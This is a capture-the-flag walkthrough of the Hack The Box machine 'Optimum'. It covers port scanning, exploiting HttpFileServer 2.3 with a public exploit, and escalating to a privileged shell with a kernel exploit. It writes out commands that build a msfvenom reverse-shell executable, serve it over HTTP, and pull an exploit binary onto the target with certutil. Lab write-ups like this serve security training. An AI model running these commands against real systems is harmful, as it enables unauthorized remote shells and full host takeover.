Box: Optimum
Level: Easy
OS: Windows
Let's get started.
Recon
Portscanning
command:sudo nmap -A -T4 -v -p- 10.129.111.57
Nmap scan report for 10.129.111.57
Host is up (0.20s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.015 days (since Sun Sep 17 16:46:43 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 197.31 ms 10.10.14.1
2 197.47 ms 10.129.111.57
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 17 17:07:49 2023 -- 1 IP address (1 host up) scanned in 778.27 seconds
From the scan above, only one port is open, and it runs an HTTP service: HttpFileServer (HFS) 2.3, as both the service banner and the Server header report. Our enumeration will therefore focus on port 80.
Enumeration
Navigate to the webpage
The page is served by HttpFileServer, and the version is already known from the scan: HFS 2.3.
There are public exploits for this version of HttpFileServer, so let's check.
There is one 😅. Let's exploit it right away.
Exploitation
I found a working exploit for this version, which you can download here (Exploit-DB 39161, used as 39161.py below).
Open the script and set its local IP (the LHOST) to our tun0 address and its local port (the LPORT) to the port we plan to listen on, then save the script.
As instructed in the script's comments, we need to host an nc.exe file on a web server. Rather than a real netcat binary, I generated a reverse-shell executable with msfvenom and named it nc.exe. Note that the script launches nc.exe with the listener address and port as arguments; a msfvenom payload ignores those arguments and connects back to the LHOST and LPORT baked into it at generation time, so they must match the listener we start.
command:msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.43 LPORT=443 -f exe -o nc.exe
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/optimum]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.43 LPORT=443 -f exe -o nc.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: nc.exe
Ensure your netcat listener is ready on the port you set in the script (443 here) before running it.
We also need to host nc.exe over HTTP on port 80, because the script's VBScript downloader fetches it from http://<our tun0 ip>/nc.exe. Serve the directory containing nc.exe with Python's built-in web server:
command:python3 -m http.server 80
Running the script itself only requires the target's IP and port:
command:python2 39161.py 10.129.58.117 80
Checking our netcat listener: no shell yet 🥲. This is expected with this script (its own header warns that you may need to run it multiple times): it sends the download stage and the execution stage back to back, so on the first run nc.exe may not have been written yet when it is called. Run the script again.
Checking our netcat listener again: we got a user shell 🙂. Let's go ahead and escalate our privileges.
Privilege Escalation
Running the systeminfo command reveals the OS version and the installed hotfixes, which is exactly what we need to pick a kernel exploit.
That OS version has a known local privilege-escalation vulnerability we can use (Exploit-DB 41020). You can get the exploit here. It is published as C source; rather than compiling it ourselves, we can download a precompiled .exe, which is easier to run on a Windows target. You can download the .exe file from here. Treat precompiled exploit binaries with care: check the file's hash against a source you trust before dropping it on a target, and keep in mind that a failed kernel exploit can crash the machine.
Next, we transfer the binary to the target. certutil is present on every Windows host and can fetch a file over HTTP from our web server:
command:certutil -urlcache -f http://10.10.14.44/41020.exe exploit.exe
To execute it, run .\exploit.exe; this should drop us into a privileged shell.
We have successfully pwned this box 😎
That will be all for today